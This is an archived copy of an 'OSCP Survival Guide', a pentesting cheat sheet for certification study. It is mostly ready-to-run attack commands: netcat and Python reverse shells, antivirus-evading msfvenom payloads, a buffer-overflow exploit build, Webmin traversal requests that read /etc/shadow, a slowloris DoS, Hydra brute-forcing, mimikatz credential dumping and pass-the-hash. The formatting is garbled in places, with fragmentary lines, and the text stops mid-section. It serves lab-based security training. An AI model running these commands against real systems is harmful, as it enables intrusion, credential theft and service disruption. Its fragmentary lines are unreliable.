Ceci est une ancienne révision du document !
Note : Cette page est un copié/collé de cette ressource : https://pastebin.com/kEh1x20f L'auteur original semble être Austin Scott et l'objectif de cette page est de sauvegarder ce document.
# OSCP-Survival-Guide <pre>
_____ _____ _____ ______ _____ _ _ _____ _ _ | _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | | | | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___ | | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \ \ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/ \___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
</pre> Kali Linux Offensive Security Certified Professional Playbook
NOTE: This document reffers to the target ip as the export variable $ip.
To set this value on the command line use the following syntax:
export ip=192.168.1.100
*UPDATE: October 2, 2017* Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly … but I recorded a stop motion video of my failed attempt. TRY HARDER!
https://www.youtube.com/watch?v=HBMZWl9zcsc
The good news is that I will be learning more and adding more content to this guide :D
## Table of Contents - [Kali Linux](#kali-linux) - [Information Gathering & Vulnerability Scanning](#information-gathering–vulnerability-scanning)
- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits) - [Shells](#shells) - [File Transfers](#file-transfers) - [Privilege Escalation](#privilege-escalation)
- [Client, Web and Password Attacks](#client-web-and-password-attacks)
- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling) - [The Metasploit Framework](#the-metasploit-framework) - [Bypassing Antivirus Software](#bypassing-antivirus-software)
Kali Linux
- Set the Target IP Address to the `$ip` system variable
`export ip=192.168.1.100`
- Find the location of a file
`locate sbd.exe`
- Search through directories in the `$PATH` environment variable
`which sbd`
- Find a search for a file that contains a specific string in it’s
name: `find / -name sbd\*`
- Show active internet connections
`netstat -lntp`
- Change Password
`passwd`
- Verify a service is running and listening
`netstat -antp |grep apache`
- Start a service
`systemctl start ssh `
`systemctl start apache2`
- Have a service start at boot
`systemctl enable ssh`
- Stop a service
`systemctl stop ssh`
- Unzip a gz file
`gunzip access.log.gz`
- Unzip a tar.gz file
`tar -xzvf file.tar.gz`
- Search command history
`history | grep phrase_to_search_for`
- Download a webpage
`wget http://www.cisco.com`
- Open a webpage
`curl http://www.cisco.com`
- String manipulation
`wc index.html`
`head index.html`
`tail index.html`
`grep “href=” index.html`
`grep “href=” index.html | cut -d ”/” -f 3 | grep “\\.” | cut -d '”' -f 1 | sort -u`
`cat index.html | grep -o 'http:\[^”\]\*' | cut -d ”/” -f 3 | sort –u > list.txt` - Use a bash loop to find the IP address behind each host `for url in $(cat list.txt); do host $url; done` - Collect all the IP Addresses from a log file and sort by frequency `cat access.log | cut -d ” ” -f 1 | sort | uniq -c | sort -urn` - Decoding using Kali - Decode Base64 Encoded Values `echo -n “QWxhZGRpbjpvcGVuIHNlc2FtZQ==” | base64 –decode` - Decode Hexidecimal Encoded Values `echo -n “46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874” | xxd -r -ps` - Netcat - Read and write TCP and UDP Packets - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems): [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/) - Connect to a POP3 mail server `nc -nv $ip 110` - Listen on TCP/UDP port `nc -nlvp 4444` - Connect to a netcat port `nc -nv $ip 4444` - Send a file using netcat `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe` - Receive a file using netcat `nc -nlvp 4444 > incoming.exe` - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that… whereis nc nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz /bin/nc.traditional -e /bin/bash 1.2.3.4 4444 - Create a reverse shell with Ncat using cmd.exe on Windows `nc.exe -nlvp 4444 -e cmd.exe` or `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe` - Create a reverse shell with Ncat using bash on Linux `nc -nv $ip 4444 -e /bin/bash` - Netcat for Banner Grabbing: `echo ”” | nc -nv -w1 <IP Address> <Ports>` - Ncat - Netcat for Nmap project which provides more security avoid IDS - Reverse shell from windows using cmd.exe using ssl `ncat –exec cmd.exe –allow $ip -vnl 4444 –ssl` - Listen on port 4444 using ssl `ncat -v $ip 4444 –ssl` - Wireshark - Show only SMTP (port 25) and ICMP traffic: `tcp.port eq 25 or icmp` - Show only traffic in the LAN (192.168.x.x), between workstations and servers – no Internet: `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16` - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip` - Some commands are equal `ip.addr == xxx.xxx.xxx.xxx` Equals `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx ` ` ip.addr != xxx.xxx.xxx.xxx` Equals `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` - Tcpdump - Display a pcap file `tcpdump -r passwordz.pcap` - Display ips and filter and sort `tcpdump -n -r passwordz.pcap | awk -F” ” '{print $3}' | sort -u | head` - Grab a packet capture on port 80 `tcpdump tcp port 80 -w output.pcap -i eth0` - Check for ACK or PSH flag set in a TCP packet `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap` - IPTables - Deny traffic to ports except for Local Loopback `iptables -A INPUT -p tcp –destination-port 13327 ! -d $ip -j DROP ` `iptables -A INPUT -p tcp –destination-port 9991 ! -d $ip -j DROP` - Clear ALL IPTables firewall rules iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -t nat -F iptables -t mangle -F iptables -F iptables -X iptables -t raw -F iptables -t raw -X Information Gathering & Vulnerability Scanning =================================================================================================================================== - Passive Information Gathering ————————————————————————————————————————— - Google Hacking - Google search to find website sub domains `site:microsoft.com` - Google filetype, and intitle `intitle:“netbotz appliance” “OK” -filetype:pdf` - Google inurl `inurl:“level/15/sexec/-/show”` - Google Hacking Database: https://www.exploit-db.com/google-hacking-database/ - SSL Certificate Testing [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html) - Email Harvesting - Simply Email `git clone https://github.com/killswitch-GUI/SimplyEmail.git ` `./SimplyEmail.py -all -e TARGET-DOMAIN` - Netcraft - Determine the operating system and tools used to build a site https://searchdns.netcraft.com/ - Whois Enumeration `whois domain-name-here.com ` `whois $ip` - Banner Grabbing - `nc -v $ip 25` - `telnet $ip 25` - `nc TARGET-IP 80` - Recon-ng - full-featured web reconnaissance framework written in Python - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git ` `cd /opt/recon-ng ` `./recon-ng ` `show modules ` `help` - Active Information Gathering ————————————————————————————————————————– <!– –> - Port Scanning ———————————————————————————————————– *Subnet Reference Table* / | Addresses | Hosts | Netmask | Amount of a Class C — | — | — | — | — /30 | 4 | 2 | 255.255.255.252| 1/64 /29 | 8 | 6 | 255.255.255.248 | 1/32 /28 | 16 | 14 | 255.255.255.240 | 1/16 /27 | 32 | 30 | 255.255.255.224 | 1/8 /26 | 64 | 62 | 255.255.255.192 | 1/4 /25 | 128 | 126 | 255.255.255.128 | 1/2 /24 | 256 | 254 | 255.255.255.0 | 1 /23 | 512 | 510 | 255.255.254.0 | 2 /22 | 1024 | 1022 | 255.255.252.0 | 4 /21 | 2048 | 2046 | 255.255.248.0 | 8 /20 | 4096 | 4094 | 255.255.240.0 | 16 /19 | 8192 | 8190 | 255.255.224.0 | 32 /18 | 16384 | 16382 | 255.255.192.0 | 64 /17 | 32768 | 32766 | 255.255.128.0 | 128 /16 | 65536 | 65534 | 255.255.0.0 | 256 - Set the ip address as a varble `export ip=192.168.1.100 ` `nmap -A -T4 -p- $ip` - Netcat port Scanning `nc -nvv -w 1 -z $ip 3388-3390` - Discover active IPs usign ARP on the network: `arp-scan $ip/24` - Discover who else is on the network `netdiscover` - Discover IP Mac and Mac vendors from ARP `netdiscover -r $ip/24` - Nmap stealth scan using SYN `nmap -sS $ip` - Nmap stealth scan using FIN `nmap -sF $ip` - Nmap Banner Grabbing `nmap -sV -sT $ip` - Nmap OS Fingerprinting `nmap -O $ip` - Nmap Regular Scan: `nmap $ip/24` - Enumeration Scan `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt` - Enumeration Scan All Ports TCP / UDP and output to a txt file `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip` - Nmap output to a file: `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24` - Quick Scan: `nmap -T4 -F $ip/24` - Quick Scan Plus: `nmap -sV -T4 -O -F –version-light $ip/24` - Quick traceroute `nmap -sn –traceroute $ip` - All TCP and UDP Ports `nmap -v -sU -sS -p- -A -T4 $ip` - Intense Scan: `nmap -T4 -A -v $ip` - Intense Scan Plus UDP `nmap -sS -sU -T4 -A -v $ip/24` - Intense Scan ALL TCP Ports `nmap -p 1-65535 -T4 -A -v $ip/24` - Intense Scan - No Ping `nmap -T4 -A -v -Pn $ip/24` - Ping scan `nmap -sn $ip/24` - Slow Comprehensive Scan `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 –script “default or (discovery and safe)” $ip/24` - Scan with Active connect in order to weed out any spoofed ports designed to troll you `nmap -p1-65535 -A -T5 -sT $ip` - Enumeration ———– - DNS Enumeration - NMAP DNS Hostnames Lookup `nmap -F –dns-server <dns server ip> <target ip range>` - Host Lookup `host -t ns megacorpone.com` - Reverse Lookup Brute Force - find domains in the same range `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v “not found”` - Perform DNS IP Lookup `dig a domain-name-here.com @nameserver` - Perform MX Record Lookup `dig mx domain-name-here.com @nameserver` - Perform Zone Transfer with DIG `dig axfr domain-name-here.com @nameserver` - DNS Zone Transfers Windows DNS zone transfer `nslookup → set type=any → ls -d blah.com ` Linux DNS zone transfer `dig axfr blah.com @ns1.blah.com` - Dnsrecon DNS Brute Force `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml` - Dnsrecon DNS List of megacorp `dnsrecon -d megacorpone.com -t axfr` - DNSEnum `dnsenum zonetransfer.me` - NMap Enumeration Script List: - NMap Discovery [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html) - Nmap port version detection MAXIMUM power `nmap -vvv -A –reason –script=”+(safe or default) and not broadcast” -p <port> <host>` - NFS (Network File System) Enumeration - Show Mountable NFS Shares `nmap -sV –script=nfs-showmount $ip` - RPC (Remote Procedure Call) Enumeration - Connect to an RPC share without a username and password and enumerate privledges `rpcclient –user=”” –command=enumprivs -N $ip` - Connect to an RPC share with a username and enumerate privledges `rpcclient –user=”<Username>” –command=enumprivs $ip` - SMB Enumeration - SMB OS Discovery `nmap $ip –script smb-os-discovery.nse` - Nmap port scan `nmap -v -p 139,445 -oG smb.txt $ip-254` - Netbios Information Scanning `nbtscan -r $ip/24` - Nmap find exposed Netbios servers `nmap -sU –script nbstat.nse -p 137 $ip` - Nmap all SMB scripts scan `nmap -sV -Pn -vv -p 445 –script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' –script-args=unsafe=1 $ip` - Nmap all SMB scripts authenticated scan `nmap -sV -Pn -vv -p 445 –script-args smbuser=<username>,smbpass=<password> –script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' –script-args=unsafe=1 $ip` - SMB Enumeration Tools `nmblookup -A $ip ` `smbclient MOUNT/share -I $ip -N `
`rpcclient -U "" $ip `
`enum4linux $ip `
`enum4linux -a $ip`
`smbclient -L $ip` - Nmap Scan for Open SMB Shares `nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.10.0/24` - Nmap scans for vulnerable SMB Servers `nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 $ip` - Nmap List all SMB scripts installed `ls -l /usr/share/nmap/scripts/smb*` - Enumerate SMB Users `nmap -sU -sS –script=smb-enum-users -p U:137,T:139 $ip-14` OR `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip` - RID Cycling - Null Sessions `ridenum.py $ip 500 50000 dict.txt` - Manual Null Session Testing Windows: `net use \\$ip\IPC$ ”” /u:”“` Linux: `smbclient -L $ip`
- SMTP Enumeration - Mail Severs
`nc -nv $ip 25`
- POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
root@kali:~# telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydean
list
+OK 2 1807 1 786 2 1021
retr 1
+OK Message follows From: jamesbrown@motown.com Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z
- SNMP Enumeration -Simple Network Management Protocol
`apt-get install snmp-mibs-downloader download-mibs `
`echo "" > /etc/snmp/snmp.conf`
`nmap -sV -p 161 –script=snmp-info $ip/24`
`apt-get install snmp snmp-mibs-downloader `
`wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
/usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
- MS SQL Server Enumeration
`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
- Webmin and miniserv/0.01 Enumeration - Port 10000
Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
- Linux OS Enumeration
`find / -perm -4000 2>/dev/null`
`cat /etc/issue`
`uname -a`
`ps -xaf`
`sudo -l`
`iptables –table nat –list
iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security`
- Windows OS Enumeration
- Vulnerability Scanning with Nmap
- Nmap Exploit Scripts
[*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
- Nmap search through vulnerability scripts
`cd /usr/share/nmap/scripts/ ls -l \*vuln\*`
- Nmap search through Nmap Scripts for a specific keyword
`ls /usr/share/nmap/scripts/\* | grep ftp`
- Scan for vulnerable exploits with nmap
`nmap --script exploit -Pn $ip`
- NMap Auth Scripts
[*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
- Nmap Vuln Scanning
[*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
- NMap DOS Scanning
`nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true`
- Scan for coldfusion web vulnerabilities
`nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
- Anonymous FTP dump with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- SMB Security mode scan with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- File Enumeration
`wget https://highon.coffee/downloads/linux-local-enum.sh `
`chmod +x ./linux-local-enum.sh ` `./linux-local-enum.sh`
`find / -executable -type f 2> /dev/null | egrep -v “^/bin|^/var|^/etc|^/usr” | xargs ls -lh | grep Aug`
`find /. -name suid\*`
`strings <filename>`
`file <filename>`
- HTTP Enumeration
`gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
`dirb http:$ip/ wordlist.dict ` `dirb <http://vm/> ` Dirb against a proxy - `dirb [http:$ip/](http://172.16.0.19/) -p $ip:3129`
`nikto -h $ip`
`nmap –script=http-enum -p80 -n $ip/24`
`nmap –script http-methods –script-args http-methods.url-path='/test' $ip`
`curl -vX OPTIONS vm/test`
`uniscan -qweds -u <http://vm/>`
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
Recurse level 3
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
<!– –>
- Open a service using a port knock (Secured with Knockd)
for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201 --max-retries 0 -p $x server\_ip\_address; done
- WordPress Scan - Wordpress security scanner
- RSH Enumeration - Unencrypted file transfer system
- Finger Enumeration
- TLS & SSL Testing
OUTPUT-FILE.html
- Proxy Enumeration (useful for open proxies)
Buffer Overflows and Exploits
- DEP and ASLR - Data Execution Prevention (DEP) and Address Space
Layout Randomization (ASLR)
- Nmap Fuzzers:
[https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
nmap –script http-form-fuzzer –script-args
'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
nmap –script dns-fuzz –script-args timelimit=2h $ip -d
- MSFvenom
[*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
- Windows Buffer Overflows
locate pattern_create pattern_create.rb -l 2700 locate pattern_offset pattern_offset.rb -q 39694438
buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP 00000000 FFE4 jmp esp
!mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
exe -o shell\_reverse.exe
Shikata\_ga\_nai
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -o shell\_reverse\_msf\_encoded.exe
executable
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell\_reverse\_msf\_encoded\_embedded.exe
msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
LPORT=443 -f exe -o met\_https\_reverse.exe
- Linux Buffer Overflows
edb –run /usr/games/crossfire/bin/crossfire
add eax,12
jmp eax 83C00C add eax,byte +0xc FFE0 jmp eax
times 0x00 - 0xFF
“\\x97\\x45\\x13\\x08” \# Found at Address 08134597
“\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90”
“\\x00\\x0a\\x0d\\x20” –e x86/shikata\_ga\_nai
nc -v $ip 4444
Shells
- Netcat Shell Listener
`nc -nlvp 4444`
- Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
(hint: sudo -l to see what you can run)
You can overcome this by executing an SSH shell to your localhost:
ssh user@$ip nc $localip 4444 -e /bin/sh enter user's password python -c 'import pty; pty.spawn("/bin/sh")' export TERM=linux
`python -c 'import pty; pty.spawn("/bin/sh")'`
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
`echo os.system('/bin/bash')`
`/bin/sh -i`
`perl —e 'exec "/bin/sh";'`
perl: `exec "/bin/sh";`
ruby: `exec "/bin/sh"`
lua: `os.execute('/bin/sh')`
From within IRB: `exec "/bin/sh"`
From within vi: `:!bash` or
`:set shell=/bin/bash:shell`
From within vim `':!bash':`
From within nmap: `!sh`
From within tcpdump
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
From busybox `/bin/busybox telnetd -|/bin/sh -p9999`
- Pen test monkey PHP reverse shell
[http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
- php-findsock-shell - turns PHP port 80 into an interactive shell
[http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
- Perl Reverse Shell
[http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
- PHP powered web browser Shell b374k with file upload etc.
[https://github.com/b374k/b374k](https://github.com/b374k/b374k)
- Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
- Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration.
git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap/ ls pip install couchdb pip install pbkdf2 pip install ipcalc python nosqlmap.py --help
- Password Attacks
for x in 'index' 'about' 'post' 'contact' ; do curl
http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; done
html2dic index.html.out | sort -u > index-html.dict
[*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
Networked Devices
[*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
[*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
[*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
nmap –script brute -Pn <target.com or ip>
<enter>
nmap –script=mysql-brute $ip
cd /usr/share/wordlists
attempting to dump the password hashes and
cached credentials.
passwords and hashes
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz) From metasploit meterpreter (must have System level access): `meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
`cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
nano /etc/john/john.conf
`john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
directory
`medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
`ncrack -vv –user offsec -P password-file.txt rdp:$ip` - Hydra - Hydra brute force against SNMP `hydra -P password-file.txt -v $ip snmp` - Hydra FTP known user and password list `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp` - Hydra SSH using list of users and passwords `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh` - Hydra SSH using a known password and a username list `hydra -v -V -u -L users.txt -p ”<known password>” -t 1 -u $ip ssh` - Hydra SSH Against Known username on port 22 `hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt` - Hydra POP3 Brute Force `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V` - Hydra SMTP Brute Force `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V` - Hydra attack http get 401 login with a dictionary `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin` - Hydra attack Windows Remote Desktop with rockyou `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp:$ip`
`hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
- <span id=“_bnmnt83v58wk” class=“anchor”><span id=“_Toc480741822” class=“anchor”></span></span>Password Hash Attacks
[*https://crackstation.net/*](https://crackstation.net/)
Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the –force parameter. apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev and apt-get install pocl-opencl-icd
Cracking Linux Hashes - /etc/shadow file ``` 500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` Cracking Windows Hashes ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` Cracking Common Application Hashes ``` 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash ```
Create a .hash file with all the hashes you want to crack puthasheshere.hash: ``` $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ ```
Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
`hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
Wordpress clear text: test
Hashcat example cracking Wordpress passwords using rockyou:
`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
[*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
`hash-identifier`
`unshadow passwd-file.txt shadow-file.txt ` `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
- John the Ripper - Password Hash Cracking
`john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`
`john --format=descrypt hash --show`
- Passing the Hash in Windows
Dump the password hashes and attempt a pass-the-hash attack
against another system:
`export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
`pth-winexe -U administrator //$ip cmd`
<span id=“_6nmbgmpltwon” class=“anchor”><span id=“_Toc480741823” class=“anchor”></span></span>Networking, Pivoting and Tunneling
- Port Forwarding - accept traffic on a given IP address and port and
redirect it to a different IP address and port
`\# bindadress bindport connectaddress connectport `
`w.x.y.z 53 a.b.c.d 80`
- SSH Local Port Forwarding: supports bi-directional communication
channels
host>:<remote port>`
- SSH Remote Port Forwarding: Suitable for popping a remote shell on
an internal non routable network
host>:<local port>`
- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
<target>`
- Proxychains - Perform nmap scan within a DMZ from an external
computer
`ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com` `ssh -f -N -R 2222:<local host>:22 root@<remote host>`
2222
`ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
using proxy chains
`proxychains nmap --top-ports=20 -sT -Pn $ip/24`
- HTTP Tunneling
`nc -vvn $ip 8888`
- Traffic Encapsulation - Bypassing deep packet inspection
On server side:
`sudo hts -F <server ip addr>:<port of your app> 80 ` On client side: `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel`
- Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
network
`plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`
- Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
(bypass deep packet inspection)
`httptunnel_client.exe`
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`
- VLAN Hopping
chmod 700 frogger.sh
./frogger.sh`
- VPN Hacking
`./udp-protocol-scanner.pl -p ike $ip`
`./udp-protocol-scanner.pl -p ike -f ip.txt`
`pip install pyip`
`git clone https://github.com/SpiderLabs/ikeforce.git `
Perform IKE VPN enumeration with IKEForce:
`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic `
Bruteforce IKE VPN using IKEForce:
